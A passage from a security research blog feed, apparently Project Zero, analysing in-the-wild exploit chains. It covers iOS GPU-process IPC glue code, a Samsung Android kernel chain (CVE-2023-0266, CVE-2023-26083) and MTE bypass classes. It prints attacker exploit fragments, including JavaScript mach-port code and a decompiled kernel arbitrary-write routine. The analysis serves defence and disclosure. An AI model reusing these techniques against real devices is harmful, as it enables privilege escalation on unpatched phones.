 new Int64("0x0a1a0a1a0a2a0a2c"); // 48

// offset of m_sendPort

var offset_of_m_sendPort_in_IPC_Connection = new Int64("0x0a1a0a1a0a2a0a2d"); // 280

// find the m_webProcessConnections HashMap:

var m_webProcessConnections =

  read64( WebKit::GPUProcess::GPUProcess.add(

           offset_of_m_webProcessConnections)).noPAC();

They iterate through all the entries in that HashMap to collect all the mach ports representing all the GPU Process to WebContent IPC connections:

var entries_cnt = read64(m_webProcessConnections.sub(8)).hi().asInt32();

var GPU_to_WebProcess_send_ports = [];

for (var he = 0; he < entries_cnt; he++) {

  var hash_map_key = read64(m_webProcessConnections.add(he * 16));

  if (hash_map_key.is0() ||

      hash_map_key.equals(const_int64_minus_1))

  {

    continue

  }

 

  var GPUConnectionToWebProcess =

    read64(m_webProcessConnections.add(he * 16 + 8));

  if (GPUConnectionToWebProcess.is0()) {

    continue

  }

  var m_connection =

    read64(

      GPUConnectionToWebProcess.add(

        offset_of_m_connection_in_GPUConnectionToWebProcess));

  var m_sendPort =

    BigInt(read64(

      m_connection.add(

        offset_of_m_sendPort_in_IPC_Connection)).lo().asInt32());

  GPU_to_WebProcess_send_ports.push(m_sendPort)

}

They allocate a new mach port then iterate through each of the GPU Process to WebContent connection ports, sending each one a mach message with a port descriptor containing a send right to the newly allocated port:

for (let WebProcess_send_port of GPU_to_WebProcess_send_ports) {

  for (let _ = 0; _ < d; _++) {

    // memset the message to 0

    for (let e = 0; e < msg.byteLength; e++) {

      msg.setUint8(e, 0)

    }

  // complex message

  hello_msg.header.msgh_bits.set(

    msg, MACH_MSG_TYPE_COPY_SEND | MACH_MSGH_BITS_COMPLEX, 0);

  // send to the web process

  hello_msg.header.msgh_remote_port.set(

    msg, WebProcess_send_port, 0);

  hello_msg.header.msgh_size.set(msg, hello_msg.__size, 0);

  // one descriptor

  hello_msg.body.msgh_descriptor_count.set(

    msg, 1, hello_msg.header.__size);

  // send a right to the comm port:

  hello_msg.communication_port.name.set(

    msg, comm_port_receive_right,

    hello_msg.header.__size + hello_msg.body.__size);

  // give other side a send right

  hello_msg.communication_port.disposition.set(

    msg, MACH_MSG_TYPE_MAKE_SEND,

    hello_msg_buffer.header.__size + hello_msg.body.__size);

  hello_msg.communication_port.type.set(

    msg, MACH_MSG_PORT_DESCRIPTOR,

    hello_msg.header.__size + hello_msg.body.__size);

  msg.setBigUint64(hello_msg.data.offset, BigInt(_), true);

  // send the request

  kr = mach_msg_send(u8array_backing_ptr(msg));

  if (kr != KERN_SUCCESS) {

    continue

  }

}

Note that, apart from having to use ArrayBuffers instead of pointers, this looks almost like it would if it was written in C and executing truly arbitrary native code. But as we've seen, there's a huge amount of complexity hidden behind that simple call to mach_msg_send.

The JS then tries to receive a reply to the hello message, and if they do it's assumed that they have found the WebContent process which compromised the GPU process and is waiting for the GPU process exploit to succeed.

It's at this point that we finally approach the final stages of this writeup.

Last Loops

Having established a new communications channel with the native code running in the WebContent process the JS enters an infinite loop waiting to service requests:

function handle_comms_with_compromised_web_process(comm_port) {

  var kr = KERN_SUCCESS;

  let request_msg = alloc_message_from_proto(req_proto);

  while (true) {

    for (let e = 0; e < request_msg.byteLength; e++) {

      request_msg.setUint8(e, 0)

    }

    req_proto.header.msgh_local_port.set(request_msg, comm_port, 0);

    req_proto.msgh_size.set(request_msg, req_proto.__size, 0);

    // get a request

    kr = mach_msg_receive(u8array_backing_ptr(request_msg));

    if (kr != KERN_SUCCESS) {

      return kr

    }

    let msgh_id = req_proto.header.msgh_id.get(request_msg, 0);

    handle_request_from_web_process(msgh_id, request_msg)

  }

}

In the end, this entire journey culminates in the vending of 9 new js-implemented IPCs (msgh_id values 0 through 8.)

IPC 0:

Just sends a reply message containing KERN_SUCCESS

IPC 1 - 4

These interact with the AppleM2ScalerCSCDriver userclient and presumably trigger the kernel bug.

IPC 5:

Wraps io_service_open_extended, taking a service name and connection type.

IPC 6:

This takes an address and a size and creates a VM_PROT_READ | VM_PROT_WRITE mach_memory_entry covering the requested region which it returns via a port descriptor.

IPC 7:

This IPC extracts and returns via a MOVE_SEND disposition the requested mach port name.

IPC 8:

This simply calls the exit syscall, presumably to cleanly terminate the process. If that fails, it causes a NULL pointer dereference to crash the process:

  case request_id_const_8: {

    syscall(1, 0);

    read64(new Int64("0x00000000"));

    break

  }

Conclusion

This exploit was undoubtedly complex. Often this complexity is interpreted as a sign that the difficulty of finding and exploiting vulnerabilities is increasing. Yet the buffer overflow vulnerability at the core of this exploit was not complex - it was a well-known, simple anti-pattern in a programming language whose security weaknesses have been studied for decades. I imagine that this vulnerability was relatively easy for the attackers to discover.

The vast majority of the complexity lay in the later post-compromise stages - the glue which connected this IPC vulnerability to the next one in the chain. In my opinion, the reason the attackers invested so much time and effort in this part is that it's reusable. It is a high one-time cost which then hugely decreases the marginal cost of gluing the next IPC bug to the next kernel bug.

Even in a world with NX memory, mandatory code signing, pointer authentication and a myriad of other mitigations, creative attackers are still able to build weird machines just as powerful as native code. The age of data-only exploitation is truly here; and yet another mitigation to fix one more trick is unlikely to end that. But what does make a difference is focusing on the fundamentals: early-stage design and code reviews, broad testing and code quality. This vulnerability was introduced less than two years ago — we as an industry, at a minimum should be aiming to ensure that at least new code is vetted for well-known vulnerabilities like buffer overflows. A low bar which is clearly still not being met.

Analyzing a Modern In-the-wild Android Exploit

19 September 2023 at 16:01

By Seth Jenkins, Project Zero

Introduction


In December 2022, Google’s Threat Analysis Group (TAG) discovered an in-the-wild exploit chain targeting Samsung Android devices. TAG’s blog post covers the targeting and the actor behind the campaign. This is a technical analysis of the final stage of one of the exploit chains, specifically CVE-2023-0266 (a 0-day in the ALSA compatibility layer) and CVE-2023-26083 (a 0-day in the Mali GPU driver) as well as the techniques used by the attacker to gain kernel arbitrary read/write access.


Notably, several of the previous stages of the exploit chain used n-day vulnerabilities:

  • CVE-2022-4262, a 0-day vulnerability in Chrome was exploited in the Samsung browser to achieve RCE.

  • CVE-2022-3038, a Chrome n-day that unpatched in the Samsung browser, was used to escape the Samsung browser sandbox. 

  • CVE-2022-22706, a Mali n-day, was used to achieve higher-level userland privileges. While that bug had been patched by Arm in January of 2022, the patch had not been downstreamed into Samsung devices at the point that the exploit chain was discovered.

We now pick up the thread after the attacker has achieved execution as system_server.


Bug #1: Compatibility Layers Have Bugs Too (CVE-2023-0266)

The exploit continues with a race condition in the kernel Advanced Linux Sound Architecture (ALSA) driver, CVE-2023-0266. 64-bit Android kernels support 32-bit syscall calling conventions in order to maintain compatibility with 32-bit programs and apps. As part of this compatibility layer, the kernel maintains code to translate 32-bit system calls into a format understandable by the rest of the 64-bit kernel code. In many cases, the code backing this compatibility layer simply wraps the 64-bit system calls with no extra logic, but in some cases important behaviors are re-implemented in the compatibility layer’s code. Such duplication increases the potential for bugs, as the compatibility layer can be forgotten while making consequential changes. 


In 2017, there was a refactoring in the ALSA driver to move the lock acquisition out of snd_ctl_elem_{write|read}() functions and further up the call graph for the SNDRV_CTL_IOCTL_ELEM_{READ|WRITE} ioctls. However, this commit only addressed the 64-bit ioctl code, introducing a race condition into the 32-bit compatibility layer SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 ioctls.


The 32-bit and 64-bit ioctls differ until they both call snd_ctl_elem_{write|read}

 so when the lock was moved up the 64-bit call chain, it was entirely removed from the 32-bit ioctls. Here’s the code path for SNDRV_CTL_IOCTL_ELEM_WRITE  in 64-bit mode on kernel 5.10.107 post-refactor:


snd_ctl_ioctl

  snd_ctl_elem_write_user

    [takes controls_rwsem]

    snd_ctl_elem_write [lock properly held, all good]

    [drops controls_rwsem]



And here is the code path for that same ioctl called in 32-bit mode:


snd_ctl_ioctl_compat

  snd_ctl_elem_write_user_compat

    ctl_elem_write_user

      snd_ctl_elem_write [missing lock, not good]


These missing locks allowed the attacker to race snd_ctl_elem_add and snd_ctl_elem_write_user_compat calls resulting in snd_ctl_elem_write executing with a freed struct snd_kcontrol object. The 32-bit SNDRV_CTL_IOCTL_ELEM_READ ioctl behaved very similarly to the SNDRV_CTL_IOCTL_ELEM_WRITE ioctl, with the same bug leading to a similar primitive.


In March 2021, these missing locks were added to SNDRV_CTL_IOCTL_ELEM_WRITE32 in upstream commit 1fa4445f9adf1 when the locks were moved back from snd_ctl_elem_write_user in to snd_ctl_elem_write in what was supposed to be an inconsequential refactor. This change accidentally fixed the SNDRV_CTL_IOCTL_ELEM_WRITE32 half of the bug. However this commit was never backported or merged into the Android kernel as its security impact was not identified and thus was able to be exploited in-the-wild in December 2022. The SNDRV_CTL_IOCTL_ELEM_READ32 call also remained unpatched until January 2023 when the in-the-wild exploit was discovered.


A New Heap Spray Primitive

Most exploits take advantage of such a classical UAF condition by reclaiming the virtual memory backing the freed object with attacker controlled data, and this exploit is no exception. Interestingly the attacker used Mali GPU driver features to perform the reclaim technique, despite the primary memory corruption bug being agnostic to the GPU used by the device. By creating many REQ_SOFT_JIT_FREE jobs which are gated behind a BASE_JD_REQ_SOFT_EVENT_WAIT, the attacker can take advantage of the associated kmalloc_array/copy_to_user calls in kbase_jit_free_prepare to create a powerful heap spray technique - a heap spray which is fully attacker controlled, variable in size, temporally indefinite and controllably freeable. These heap spray techniques are uncommon but not unheard of, and other heap spray strategies do exist but at least some of them, such as the userfaultfd technique, are mitigated by SELinux policy and sysctl parameters although others (such as the equivalent technique provided by AppFuse) may still exist. That makes this new technique particularly potent on Android devices where many of these spray strategies are mitigated.


Bug #2: A Leaky Feature (CVE-2023-26083)

Mali provides a performance tracing facility called "timeline stream", "tlstream" or "tl". This facility was available to unprivileged code, traces all GPU operations across the whole system (including GPU operations by other processes), and uses kernel pointers as object identifiers in the messages sent to userspace. This means that by generating tlstream events referencing objects containing attacker-controlled data, the attackers are able to place 16 bytes of controlled data at a known kernel address. Additionally, the attackers can use this capability to defeat KASLR as these kernel pointers also leak information about the kernel address space back to userland. This issue was reported to ARM as CVE-2023-26083 on January 17th, 2023, and is now fixed by preventing unprivileged access to the tlstream facility.


Combining The Primitives

The heap spray described above is used to reclaim the backing store of the improperly freed struct snd_kcontrol used in snd_ctl_elem_write. The tlstream facility then allows attackers to fill that backing store with pointers to attacker controlled data. Blending these two capabilities allows attackers to forge highly detailed struct snd_kcontrol objects. The snd_ctl_elem_write code (along with the struct snd_kcontrol definition) is shown below:


struct snd_kcontrol {

struct list_head list; /* list of controls */

struct snd_ctl_elem_id id;

unsigned int count; /* count of same elements */

snd_kcontrol_info_t *info;

snd_kcontrol_get_t *get;

snd_kcontrol_put_t *put;

union {

snd_kcontrol_tlv_rw_t *c;

const unsigned int *p;

} tlv;

unsigned long private_value;

void *private_data;

void (*private_free)(struct snd_kcontrol *kcontrol);

struct snd_kcontrol_volatile vd[]; /* volatile data */

};

...

static int snd_ctl_elem_write(struct snd_card *card, struct snd_ctl_file *file,

      struct snd_ctl_elem_value *control)

{

struct snd_kcontrol *kctl;

struct snd_kcontrol_volatile *vd;

unsigned int index_offset;

int result;


down_write(&card->controls_rwsem);

kctl = snd_ctl_find_id(card, &control->id);

if (kctl == NULL) {

up_write(&card->controls_rwsem);

return -ENOENT;

}


index_offset = snd_ctl_get_ioff(kctl, &control->id);

vd = &kctl->vd[index_offset];

if (!(vd->access & SNDRV_CTL_ELEM_ACCESS_WRITE) || kctl->put == NULL ||

    (file && vd->owner && vd->owner != file)) {

up_write(&card->controls_rwsem);

return -EPERM;

}


snd_ctl_build_ioff(&control->id, kctl, index_offset);

result = snd_power_ref_and_wait(card);

/* validate input values */

...

if (!result)

result = kctl->put(kctl, control);

... //Drop the locks and return

}


While there are a couple different options available in this function to take advantage of an attacker-controlled kctl, the most apparent is the call to kctl->put. Since the attacker has arbitrary control of the kctl->put function pointer, they could have used this call right away to gain control over the program counter. However in this case they chose to store the developer-intended snd_ctl_elem_user_put function pointer in the kctl->put member and use the call to that function to gain arbitrary r/w instead. By default, snd_ctl_elem_user_put is the put function for snd_kcontrol structs. snd_ctl_elem_user_put does the following operations:

struct user_element {

...

char *elem_data; /* element data */

unsigned long elem_data_size; /* size of element data in bytes */

...

};

static int snd_ctl_elem_user_put(struct snd_kcontrol *kcontrol,

struct snd_ctl_elem_value *ucontrol)

{

int change;

struct user_element *ue = kcontrol->private_data;

unsigned int size = ue->elem_data_size;

char *dst = ue->elem_data +

snd_ctl_get_ioff(kcontrol, &ucontrol->id) * size;

change = memcmp(&ucontrol->value, dst, size) != 0;

if (change)

memcpy(dst, &ucontrol->value, size);

return change;

}


The attacker uses their (attacker-controlled data at known address) primitive provided by the tlstream facility to generate an allocation acting as a user_element struct. The pointer to this struct is later fed into the kctl struct as the private_data field, giving the attacker control over the struct user_element used in this function. The destination for the memcpy call comes directly out of this user_element struct, meaning that the attacker can set the destination to an arbitrary kernel address. Since the ucontrol->value used as the source comes directly from userland by design, this leads directly to an arbitrary write of controlled data to kernel virtual memory.

A Recap of the Linux Kernel VFS Subsystem

This write is unreliable because each use of the write relies heavily on races and heap sprays in order to hit. The exploit proceeds by creating a deterministic, highly reliable arbitrary read/write via the use of this original unreliable write. In the Linux kernel virtual filesystem (VFS) architecture, every struct file comes with a struct file_operations member that defines a set of function pointers used for various different system calls such as read, write, ioctl, mmap, etc. These function calls interpret the struct file’s private_data member in a type-specific way. private_data is usually a pointer to one of a variety of different data structures based on the specific struct file. Both of these members, the private_data and the fops, are populated into the struct file upon allocation/creation of the struct file which for example happens within syscalls in the open family. This fops table can be registered as part of a miscdevice which is used for certain files in the /dev filesystem. For example /dev/ashmem which is an Android-specific shared memory API:


static const struct file_operations ashmem_fops = {

.owner = THIS_MODULE,

.open = ashmem_open,

.release = ashmem_release,

.read_iter = ashmem_read_iter,

.llseek = ashmem_llseek,

.mmap = ashmem_mmap,

.unlocked_ioctl = ashmem_ioctl,

#ifdef CONFIG_COMPAT

.compat_ioctl = compat_ashmem_ioctl,

#endif

};


static struct miscdevice ashmem_misc = {

.minor = MISC_DYNAMIC_MINOR,

.name = "ashmem",

.fops = &ashmem_fops,

};


static int __init ashmem_init(void)

{

int ret = -ENOMEM;

...

ret = misc_register(&ashmem_misc);

if (unlikely(ret)) {

pr_err("failed to register misc device!\n");

goto out_free2;

}

...

}

Under normal circumstances, the intended flow is that when userland calls open on /dev/ashmem, a struct file is created, and a pointer to the ashmem_fops table is populated into the struct.


Stabilizing The Arbitrary Write

While the fops table itself is read-only, the ashmem_misc data structure that contains the pointer used for populating future struct files during an open of /dev/ashmem is not. By replacing ashmem_misc.fops with a pointer to a fake file_operations struct, an attacker can control the file_operations that will be used by files created by open("/dev/ashmem") going forward. This requires forging a replacement ashmem_fops file_operations table in kernel memory so that a future arbitrary-write can write a pointer to that file_operations table into the ashmem_misc structure. While the previously explained Mali tlstream “controlled data at a known kernel address” primitive (CVE-2023-26083) provides precisely this sort of ability, the object allocated to read out via tlstream only gives 16 bytes of attacker-controlled data - not enough controlled memory to forge a complete file_operations table. Instead, the exploit uses their initial arbitrary write to construct a new fake fops table within the .data section of the kernel. The exploit writes into the init_uts_ns kernel symbol, in particular the part of the associated structure that holds the uname of the kernel. Overwriting data in this structure provides a clear indicator of when the race conditions are won and the arbitrary write succeeds (the uname syscall returns different data than before). 


Once their fake file_operations table is forged, they use their arbitrary write once more to place a pointer to this table inside of the ashmem_misc structure. This forged file_operations struct varies from device to device, but on the Samsung S10 it looks like so:


static const struct file_operations ashmem_fops = {

.open = ashmem_open,

.release = ashmem_release,

.read = configfs_read_file

.write = configfs_write_file

.llseek = default_llseek,

.mmap = ashmem_mmap,

.unlocked_ioctl = ashmem_ioctl,

#ifdef CONFIG_COMPAT

.compat_ioctl = compat_ashmem_ioctl,

#endif

};


Note that the VFS read/write operations have been changed to point to configfs handlers instead. The combination of configfs file ops with ashmem file ops leads to an attacker-induced type-confusion on the private_data object in the struct file. Analysis of those handlers reveal simple-to-reach copy_[to/from]_user calls with the kernel pointer populated from the struct file’s private_data backing store:


static int

fill_write_buffer(struct configfs_buffer * buffer, const char __user * buf, size_t count)

{

...


if (count >= SIMPLE_ATTR_SIZE)

count = SIMPLE_ATTR_SIZE - 1;

error = copy_from_user(buffer->page,buf,count);

buffer->needs_read_fill = 1;

buffer->page[count] = 0;

return error ? -EFAULT : count;

}

...

static ssize_t

configfs_write_file(struct file *file, const char __user *buf, size_t count, loff_t *ppos)

{

struct configfs_buffer * buffer = file->private_data;

ssize_t len;


mutex_lock(&buffer->mutex);

len = fill_write_buffer(buffer, buf, count);

if (len > 0)

len = flush_write_buffer(file->f_path.dentry, buffer, len);

if (len > 0)

*ppos += len;

mutex_unlock(&buffer->mutex);

return len;

}

The private_data backing store itself can be subsequently modified by an attacker using the ashmem ioctl command ASHMEM_SET_NAME in order to change the kernel pointer used for the arbitrary read and write primitives. The final arbitrary write primitive (for example) looks like this:


int arb_write(unsigned long dst, const void *src, size_t size)

{

  __int64 page_offset; // x8

  __int128 v5; // q0

  __int64 neg_idx; // x24

  void *data_to_write; // x21

  char tmp_name_buffer[256]; // [xsp+0h] [xbp-260h] BYREF

  char name_buffer[256]; // [xsp+100h] [xbp-160h] BYREF

  char v13; // [xsp+200h] [xbp-60h]

  ...

  memset(tmp_name_buffer, 0, sizeof(tmp_name_buffer));

  page_offset = *(_QWORD *)(*(_QWORD *)(qword_898840 + 24) + 1056LL);

  if ( (page_offset & 0x8000000000000000LL) == 0 )

  {

    while ( 1 )

      ;

  }

  //dst is the kernel address we will write to

  *(_QWORD *)&tmp_name_buffer[(int)page_offset] = dst;

  neg_idx = 0;

  memset(name_buffer,'C',sizeof(name_buffer));

  //They have to do this backwards while loop so they can write

  //nulls into the name buffer

  while (1)

  {

    name_buffer[neg_idx + 244] = tmp_name_buffer[neg_idx + 255];

    if ( (ioctl(ashmem_fd, ASHMEM_SET_NAME, name_buffer) < 0)      

      break;

    if ( --neg_idx == -245 )

    {

    //At this point, the ->page used in configfs_write_file will

    //be set due to the ASHMEM_SET_NAME calls

      if ( (lseek(ashmem_fd, 0LL, 0) >= 0)

      {

        data_to_write = (void *)(mmap_page - size + 4096);

        memcpy(data_to_write, src, size);

  //This will EFAULT due to intentional misalignment on the

  //page so as to ensure copying the right number of bytes

        write(ashmem_fd, data_to_write, size + 1);

        return 0;

      }

      return -1;

    }

  }

  return -1;

}


The arbitrary read primitive is nearly identical to the arbitrary write primitive code, but instead of using write(2), they use read(2) from the ashmem_fd instead to read data from the kernel into userland.


Conclusion

This exploit chain provides a real-world example of what we believe modern in-the-wild Android exploitation looks like. An early contextual theme from the initial stages of this exploit chain (not described in detail in this post) is the reliance on n-days to bypass the hardest security boundaries. Reliance on patch backporting by downstream vendors leads to a fragile ecosystem where a single missed bugfix can lead to high-impact vulnerabilities on end-user devices. The retention of these vulnerabilities in downstream codebases counteracts the efforts that the security research and broader development community invest in discovering bugs and developing patches for widely used software. It would greatly improve the security of those end-users if vendors strongly considered efficient methods that result in faster and more reliable patch-propagation to downstream devices.


It is also particularly noteworthy that this attacker created an exploit chain using multiple bugs from kernel GPU drivers. These third-party Android drivers have varying degrees of code quality and regularity of maintenance, and this represents a notable opportunity for attackers. We also see the risk that the Linux kernel 32-bit compatibility layer presents, particularly when it requires the same patch to be re-implemented in multiple places. This requirement makes patching even more complex and error-prone, so vendors and kernel code-writers must continue to remain vigilant to ensure that the 32-bit compatibility layer presents as few security issues as possible in the future.


Update October 6th 2023: This post was edited to reflect the fact that CVE-2022-4262 was a Chrome 0-day at the time this chain was discovered, not an n-day as previously stated.


MTE As Implemented, Part 3: The Kernel

2 August 2023 at 16:30

By Mark Brand, Project Zero

Background

In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions).

In Part 1 we discussed testing the technical (and implementation) limitations of MTE on the hardware that we've had access to. In Part 2 we discussed the implications of this for mitigations built using MTE in various user-mode contexts. This post will now consider the implications of what we know on the effectiveness of MTE-based mitigations in the kernel context.

To recap - there are two key classes of bypass techniques for memory-tagging based mitigations, and these are the following:

  1. Known-tag-bypasses - In general, confidentiality of tag values is key to the effectiveness of memory-tagging as a mitigation. A breach of tag confidentiality allows the attacker to directly or indirectly ensure that their invalid memory accesses will be correctly tagged, and therefore not detectable.
  2. Unknown-tag-bypasses - Implementation limits might mean that there are opportunities for an attacker to still exploit a vulnerability despite performing memory accesses with incorrect tags that could be detected.

There are two main modes for MTE enforcement:

  1. Synchronous (sync-MTE) - tag check failures result in a hardware fault on instruction retirement. This means that the results of invalid reads and the effects of invalid writes should not be architecturally observable.
  2. Asynchronous (async-MTE) - tag check failures do not directly result in a fault. The results of invalid reads and the effects of invalid writes are architecturally observable, and the failure is delivered at some point after the faulting instruction in the form of a per-cpu flag.

Since Spectre, it has been clear that using standard memory-tagging approaches as a "hard probabilistic mitigation"1 is not generally possible - in any context where an attacker can construct a speculative side-channel, known-tag-bypasses are a fundamental weakness that must be accounted for.

Kernel-specific problems

There are a number of additional factors which make robust mitigation design using MTE more problematic in the kernel context.

From a stability perspective,
it might be considered problematic to enforce a panic on kernel-tag-check-failure detection - we believe that this would be essential for any mitigation based on async (or asymmetric) MTE modes.

Here are some problems that we think will be difficult to address systematically:

  1. Similar to the Chrome renderer scenario discussed in Part 2, we expect there to be continued problems in guaranteeing confidentiality of kernel memory in the presence of CPU speculative side-channels.

    This fundamentally limits the effectiveness of an MTE-based mitigation in the kernel against a local attacker, making known-tag-bypasses highly likely.
  2. TCR_ELx.TCMA1 is required in the current kernel implementation. This means that any pointer with the tag 0b1111 can be dereferenced without enforcing tag checks. This is necessary for various reasons - there are many places in the kernel where, for example, we need to produce a dereferenceable pointer from a physical address, or an offset in a struct page.

    This makes it possible for an attacker to reliably forge pointers to any address, which is a significant advantage during exploitation.
  3.  [ASYNC-only] Direct access to the Tag Fault Status Register TFSR_EL1 is likely necessary. If so, the kernel is capable of clearing the tag-check-failure flags for itself, this is a weakness that will likely form part of the simplest unknown-tag-bypass exploits. This weakness does not exist in user-space, as it is necessary to transition into kernel-mode to clear the tag-check-failure bits, and the transition into kernel-mode should detect the async tag-check-failure and dispatch an error appropriately.
  4. DMA - typically multiple devices on the system have DMA access to various areas of physical memory, and in the cases of complex devices such as GPUs or hardware accelerators, this includes dynamically mapping parts of normal user space or kernel space memory.

    This can pose multiple problems - any code that sets up device mappings is already critical to security, but this is also potentially of use to an attacker in constructing powerful primitives (after the "first invalid access").
  5. DMA from non-MTE enabled cores on the system - we've already seen in-the-wild attackers start to use coprocessor vulnerabilities to bypass kernel mitigations, and if those coprocessors have a lower level of general software mitigations in place we can expect to see this continue.

    This alone isn't a reason not to use MTE in kernels - it's just something that we should bear in mind, especially when considering the security implications of moving additional code to coprocessors.

Additionally, there are problems that limit coverage (due to current implementation details in the linux kernel):

  1. The kcmp syscall is problematic for confidentiality of kernel pointers, as it allows user-space to compare two struct file* pointers for equality. Other system calls have similar implementation details that allow user-space to leak information about equality of kernel pointers (fuse_lock_owner_id).
  2. Similarly to the above issue, several kernel data structures use pointers as keys, which has also been used to leak information about kernel pointers to user-space. (See here, search for epoll_fdinfo).

    This is an issue for user-space use of MTE as well, especially in the context of eg. a browser renderer process, but highlighting here that there are known instances of this pattern in the linux kernel that have already been used publicly.

  1. TYPESAFE_BY_RCU regions require/allow use-after-free access by design, so allocations in these regions could not currently be protected by memory-tagging. (See
    this thread for some discussion).
  2. In addition to skipping specific tag-check-failures (as per 3 in the list above), it may also be currently possible for an attacker to disable kasan using a single memory write. This would also be a single point of failure that would need to be avoided.

[1] A hard mitigation that does not provide deterministic protection, but which can be universally bypassed by the attacker "winning" a probabilistic condition, in the case of MTE (with 4 tag bits available, likely with one value reserved) this would probably imply a 1/15 chance of success.

MTE As Implemented, Part 2: Mitigation Case Studies

2 August 2023 at 16:30

By Mark Brand, Project Zero

Background

In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions).

In Part 1 we discussed testing the technical (and implementation) limitations of MTE on the hardware that we've had access to. This post will now consider the implications of what we know on the effectiveness of MTE-based mitigations in several important products/contexts.

To summarize - there are two key classes of bypass techniques for memory-tagging based mitigations, and these are the following (for some examples, see Part 1):

  1. Known-tag-bypasses - In general, confidentiality of tag values is key to the effectiveness of memory-tagging as a mitigation. A breach of tag confidentiality allows the attacker to directly or indirectly ensure that their invalid memory accesses will be correctly tagged, and are therefore not detectable.
  2. Unknown-tag-bypasses - Implementation limits might mean that there are opportunities for an attacker to still exploit a vulnerability despite performing memory accesses with incorrect tags that could be detected.

There are two main modes for MTE enforcement:

  1. Synchronous (sync-MTE) - tag check failures result in a hardware fault on instruction retirement. This means that the results of invalid reads and the effects of invalid writes should not be architecturally observable.
  2. Asynchronous (async-MTE) - tag check failures do not directly result in a fault. The results of invalid reads and the effects of invalid writes are architecturally observable, and the failure is delivered at some point after the faulting instruction in the form of a per-cpu flag.

Since Spectre, it has been clear that using standard memory-tagging approaches as a "hard probabilistic mitigation"1 is not generally possible. In any context where an attacker can construct a speculative side-channel, known-tag-bypasses are a fundamental weakness that must be accounted for.

Another proposed approach is combining MTE with another software approach to construct a "hard deterministic mitigation"2. The primary example of this would be the *Scan+MTE combinations proposed in Chrome to mitigate use-after-free vulnerabilities by ensuring that a tag is not re-used for an allocation while there are any stale pointers pointing to that allocation.

In this case, is async-MTE sufficient as an effective mitigation? We have demonstrated techniques that allow an unknown-tag-bypass when using async-MTE, so it seems clear that for a "hard" mitigation, (at least) sync-MTE will be necessary. This should not, however, be interpreted as implying that such a "soft" mitigation would not prove a significant inconvenience to attackers - we're going to discuss that in detail below.

How much would MTE hurt attackers?

In order to understand the "additional difficulty" that attackers will face in writing exploits that can bypass MTE based mitigations, we need to consider carefully the context in which the attacker finds themself.

We have made some assumptions here about the target reliability that a high-tier attacker would want as around 95% - this is likely lower than currently expected in most cases, but probably higher than the absolute limit at which an exploit might become too unreliable for their operational needs. We also note that in some contexts an attacker might be able to use even an extremely unreliable exploit without significantly increasing their risk of detection. While we'd expect attackers to desire (and invest in) achieving reliability, it's unlikely that even if we could force an upper bound to that reliability this would be enough to completely prevent exploitation.

However, any such drop in reliability should generally be expected to increase detection of in-the-wild usage of exploits, increasing the risk to attackers accordingly.

An additional note is that most unknown-tag-bypasses would be prevented by the use of sync-MTE, at least in the absence of specific weaknesses in the application which would over time likely be fixed as exploits are observed exploiting those weaknesses.

We consider 4 main contexts here, as we believe these are the most relevant/likely use-cases for a usermode mitigation:

Context

Mode

Bypass techniques

known-tag-bypass

unknown-tag-bypass

Chrome: Renderer Exploit

async

Trivial ♻️

Likely trivial ♻️

sync

Trivial ♻️

Bypass techniques should be rare 🛠️

Chrome: IPC Sandbox Escape

async

Likely possible in many cases ♻️

Likely possible in many cases 🐛*

sync

Likely possible in many cases ♻️

Bypass techniques should be rare 🛠️

Android: Binder Sandbox Escape

async

Difficulty will depend on service

Difficulty will depend on service 🐛*

sync

Difficulty will depend on service

Bypass techniques should be rare 🛠️

Android: Messaging App Oneshot

async

Likely impossible in most cases

Good enough bugs will be very rare 🐛*

sync

Likely impossible in most cases

Bypass techniques should be rare 🛠️

The degree of pain for attackers caused by needing to bypass MTE is roughly assessed from low to very high.

♻️: Once developed, generic bypass technique can likely be shared between exploits.

🛠️: Limited supply of bypass techniques that could be fixed, eventually eliminating this bypass.

🐛: Additional constraints imposed by bypass techniques mean that the subset of issues that are exploitable is significantly reduced with MTE.

* Note that it's also potentially possible to design software to make exploitation of these unknown-tag-bypass techniques more restrictive by eg. inserting system calls in specific choke-points. We haven't investigated the practicality or limitations of such an approach at this time, but it is unlikely to be generally applicable especially where third-party code is involved.

Chrome: Javascript -> Compromised Renderer

Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are a certainty.

For unknown-tag-bypasses, javascript should in most situations be able to avoid system calls for the duration of their exploit, so the exploit needs to complete within the soft time constraint.

It's likely that both known-tag-bypass and unknown-tag-bypass techniques can be made generic and reused across multiple different vulnerabilities.

Chrome: Compromised Renderer -> Mojo IPC Sandbox Escape

It is likely that Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are a possibility.

For unknown-tag-bypasses, we believe that there are circumstances under which multiple IPC messages can be processed without a system call in between. This does not hold for all situations, and the current public state-of-the-art techniques for Browser process IPC exploitation would perform multiple system calls and would not be suitable.

It's possible that a generic speculative-side-channel attack could be developed that would allow reuse of techniques for known-tag-bypasses against a specific privileged process (likely the Browser process). Any unknown-tag-bypass exploit would likely require additional per-bug cost to develop due to the additional complexity required in avoiding system calls for the duration of the exploit.

Android: App -> Binder IPC Sandbox Escape

It is likely that Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are a possibility.


For unknown-tag-bypasses  we note that there is a mandatory system call
ioctl(..., BINDER_WRITE_READ, …) between different IPC messages. This implies that an exploit would need to complete within the execution of the triggering IPC message in addition to meeting the soft time constraint.

As there are a large number of different Binder IPC services hosted in different processes, a known-tag-bypass technique is less likely to be reusable between different vulnerabilities. The exploitation of unknown-tag-bypasses is unlikely to be reusable, and will require specific per-vulnerability development.

An additional note - at present, .data section pointers are not tagged, so the zygote architecture means that pointer-forging between some contexts would be easy for an attacker, which could be a useful technique for exploiting some vulnerabilities leading to second-order memory corruption (eg. type confusion allowing an attacker to treat data as a pointer).

Android: Remote -> Messaging App

It is unlikely that Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are highly unlikely, unless the application allows alternative side channels (or eg. repeated exploitation attempts until the tag is correct).


For unknown-tag-bypasses, attackers will need a very good one-shot bug, likely in complex file-format parsing. An exploit would still need to meet the soft time constraint.

It's likely that exploitation techniques here will be bespoke and both per-application and per-vulnerability, even if there is significant shared code between different messaging applications.


